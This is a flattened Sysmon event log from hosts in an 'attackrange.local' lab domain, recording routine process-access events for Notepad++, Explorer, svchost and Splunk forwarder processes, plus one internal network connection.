10341000x80000000000000001047374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001047372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001047371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:28.918{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 10341000x8000000000000000806916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.504{0C1E0330-F3CC-60EB-5D79-00000000D001}25603380C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.349{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.082{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=259BC8DB5F033D4ECA4C34BED630EA61,SHA256=43B21024A9843B5E89FC826C5F16881F1D3D0C45642D37E9680C3A732BACFE7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57216-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:29.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784910FD995797B3919CDDC767365068,SHA256=B0DA6E80AA168D28128B311F7C9ADF9A6CE0816382764E15ABE4869FB64FF3AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001047433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 